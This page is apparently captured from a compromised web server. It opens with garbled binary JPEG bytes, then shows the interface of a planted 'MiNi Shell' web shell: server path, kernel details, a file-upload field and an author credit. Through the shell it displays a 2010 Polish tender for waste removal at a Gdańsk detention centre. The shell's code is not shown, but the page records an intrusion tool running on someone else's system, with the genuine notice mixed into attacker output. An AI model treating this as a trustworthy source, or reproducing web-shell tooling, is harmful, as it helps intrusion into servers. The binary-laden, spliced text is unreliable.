JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100615/154033-N-2010.html

<p class="kh_header"><b>Gdańsk: Przetarg nieograniczony nr 1/DKW/Ke/2010 na wywóz i utylizację odpadów stałych i niebezpiecznych</b><br>
<b>Numer ogłoszenia: 154033 - 2010; data zamieszczenia: 15.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 058 3231000, 3231260, faks 058 3025125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 1/DKW/Ke/2010 na wywóz i utylizację odpadów stałych i niebezpiecznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu są usługi polegające na wywozie i utylizacji odpadów stałych i niebezpiecznych z terenu Aresztu Śledczego w Gdańsku.

Przewidywana przez zamawiającego ilość odpadów w okresie 24 miesięcy wynosi:

Lp.
Przedmiot  zamówienia
Kod odpadu
Ilość w  ciągu 24 miesięcy 
Kod CPV

1
Niesegregowane odpady komunalne      
200301
338 Mg
90111300-1

2
Trociny, wióry, ścinki, drewno, płyta wiórowa i fornir inne niż wymienione w 030104                     
30105
2 Mg
90111300-1

3
Opakowania z tworzyw sztucznych       
150102
2 Mg
90111300-1

4
Opakowania ze szkła 
150107
4 Mg
90111300-1

5
Odpady betonu oraz gruz betonowy z rozbiórek i remontów 
170101
60 Mg
90111300-1

6
Zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia inne niż wymienione w 170106   
170107
120 Mg
90111300-1

7
Odpady medyczne 
180103
7000 kg
90111300-1

Określone ilości są wielkościami szacunkowymi w związku z powyższym zamawiający zastrzega sobie prawo do dokonywania bieżących korekt w zależności od potrzeb. W przypadku zamówienia przez zamawiającego ilości mniejszych lub większych od w/w  wykonawcy  nie przysługują żadne roszczenia.
Zbieranie odpadów odbywać się będzie w następujący sposób:
zmieszane odpady komunalne (kod 200301) w ilości ok. 338 ton gromadzone będą w 3 kontenerach krytych klapami o pojemności 7 m3 oraz w jednym pojemniku o pojemności 660l,
trociny, wióry, ścinki, drewno, płyta wiórowa i fornir (kod 030105) w ilości ok. 2 ton gromadzone będą w kontenerach odkrytych o pojemności 8 m3,
Opakowania z tworzyw sztucznych  (kod 150102)  w ilości ok. 2 ton gromadzone będą w pojemniku  o pojemności 1 m3,
Opakowania ze szkła (kod 150107) w ilości ok.4 ton gromadzone będą w pojemniku  o pojemności 1 m3,
1.odpady betonu oraz gruz betonowy z rozbiórek i remontów ( kod 170101) w ilości ok. 60 ton gromadzone będą w kontenerach odkrytych o pojemności 5 m3,
2.Zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia (kod 170107) w ilości ok. 120 ton gromadzone będą w kontenerach odkrytych o pojemności 5 m3,
3.odpady medyczne (kod 180103) w ilości ok. 7000 kg w workach plastikowych koloru czerwonego o pojemności 120 l dostarczonych nieodpłatnie przez wykonawcę.
 
2.Wykonawca przedmiotu zamówienia określonego w pkt. 1 tabeli, zobowiąże się na cały okres świadczenia usługi wypożyczyć nieodpłatnie w ramach świadczonej usługi 3 szt. kontenerów krytych z klapami o pojemności 7 m3 w których gromadzone będą zmieszane  odpady komunalne (kod 200301). Ze względu na charakter i specyfikę miejsca, w którym będą one usytuowane (więzienie) kontenery te zostaną poddane niezbędnym, drobnym przeróbkom zabezpieczającym kontener przed swobodnym dostępem do jego wnętrza. Zobowiąże się on także na cały okres świadczenia usługi wypożyczyć nieodpłatnie w ramach świadczonej usługi,  pojemnik 660l  w którym gromadzone będą zmieszane  odpady komunalne (kod 200301).
3.Wykonawca przedmiotu zamówienia określonego w pkt. 2, 5, 6 tabeli zobowiąże się na każde żądanie zamawiającego wypożyczyć nieodpłatnie w ramach świadczonej usługi odkryte kontenery  o pojemności 5 i 8 m3,
4.Wykonawca przedmiotu zamówienia określonego w pkt. 3, 4 tabeli zobowiąże się na cały okres świadczenia usługi wypożyczyć nieodpłatnie w ramach świadczonej usługi dwa pojemniki do selektywnej zbiórki odpadów  o pojemności 1m3 - w których gromadzone będą opakowania ze szkła (150107) oraz   opakowania z tworzyw sztucznych (150102),
5.Kontenery o pojemności 7 m3, w których gromadzone będą odpady komunalne, opróżniane będą nie rzadziej niż dwa razy w tygodniu każdy, natomiast pojemnik o pojemności 660 l dwa razy w miesiącu. Kontenery gruzowe podstawiane będą i opróżniane w miarę bieżących potrzeb zamawiającego. Pojemniki do selektywnej zbiórki odpadów opróżniane będą w miarę bieżących potrzeb zamawiającego. Odpady medyczne odbierane będą nie rzadziej niż raz na tydzień.
6.Okresem rozliczeniowym za świadczoną usługę będzie okres od pierwszego do ostatniego dnia każdego miesiąca, na koniec którego Wykonawca przedstawi fakturę VAT płatną przelewem. Termin zapłaty nie może być krótszy niż 14 dni od daty otrzymania faktury. Wraz z fakturą Wykonawca dostarczy kartę przekazania odpadu oraz dowody ważenia odpadu za dany okres rozliczeniowy. Wykonawca określając cenę jednostkową brutto bierze pod uwagę wszystkie składniki mające wpływ na wielkość ceny. W efekcie cena podana przez wykonawcę w ofercie cena musi być ceną końcową do zapłaty przez Zamawiającego i zawierać podatek od towarów i usług, podatek akcyzowy, koszty transportu, utylizacji i opłaty środowiskowej.
Dostawy  realizowane będą od daty podpisania umowy przez okres 24 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kserokopia zezwolenia, o którym mowa w art. 26 i 28 ustawy z dnia 27.04.2001r. o odpadach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie załaczonego do oferty oświadczenia o spełnaniu warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie załaczonego do oferty oświadczenia o spełnaniu warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie załaczonego do oferty oświadczenia o spełnaniu warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie załaczonego do oferty oświadczenia o spełnaniu warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa zawarta zostanie z wykonawcą, który przedłoży najkorzystniejszą ofertę spełniającą wymogi określone w SIWZ nr 1/DKW/Ke/2010 w oparciu o kryteria określone w pkt. 9 specyfikacji. Wzór umowy - załącznik nr 4 do SIWZ. Na podstawie art. 144 Ustawy Zamawiający dopuszcza  możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Warunkiem takiej zmiany jest podpisanie aneksu do istniejącej umowy oraz udokumentowanie w/w okoliczności. Przy czym Zamawiający nie dopuszcza wzrostu cen za realizację przedmiotu umowy w roku 2010, w późniejszym okresie możliwe będą uzasadnione korekty cen nie większe niż wskaźnik wzrostu cen opublikowany przez GUS oraz spowodowane wzrostem opłaty środowiskowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> można otrzymać (bezpłatnie) po złożeniu pisemnego wniosku drogą pisemną, faksem na nr (058) 302-51-25 lub drogą elektroniczną e- mail: dkw_gdansk@sw.gov.pl osobiście u Zamawiającego lub pocztą..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2010 godzina 09:30, miejsce: Sekretariat AŚ Gdańsk ul. Kurkowa 12; 80-803 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odpady Komunalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.-Przedmiot zamówienia-Kod odpadu-Jednostka miary-Ilość (w j.m.)-Cena (w zł)
Wartość brutto 
(w zł)

1
Odpady komunalne gromadzone w kontenerach o pojemności 7 m3 
200301
1 kurs
532


2
Odpady komunalne gromadzone w pojemnikach o pojemności 660 l
200301
1 kurs
48.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odpady inne niż niebezpieczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.-Przedmiot zamówienia-Kod odpadu-Jednostka miary-Ilość (w j.m.)-Cena (w zł)
Wartość brutto (w zł)

3
Trociny, wióry, ścinki, drewno, płyta wiórowa i fornir inne niż wymienione w 030104, gromadzone w kontenerach o pojemności 8 m3  
30105
1 kurs
2


4
Odpady betonu oraz gruzu betonowego z rozbiórek i remontów gromadzone w kontenerach o pojemności 5 m3   
170101
1 kurs
10


5
Zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia  gromadzone w kontenerach o pojemności 5 m3  
170107
1 kurs
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odpady opakowaniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.-Przedmiot zamówienia-Kod odpadu-Jednostka miary-Ilość (w j.m.)-Cena (w zł)
Wartość brutto (w zł)

6
Opakowania z tworzyw sztucznych gromadzone w pojemnikach o poj. 1 m3
150102
1 kurs
12


7
Opakowania szklane gromadzone w pojemnikach o poj. 1 m3
150107
1 kurs
12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odpady medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.-Przedmiot zamówienia-Kod odpadu-Jednostka miary-Ilość (w j.m.)-Cena (w zł)
Wartość brutto (w zł)

8
Odpady medyczne
180102 180103
1 kg
7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com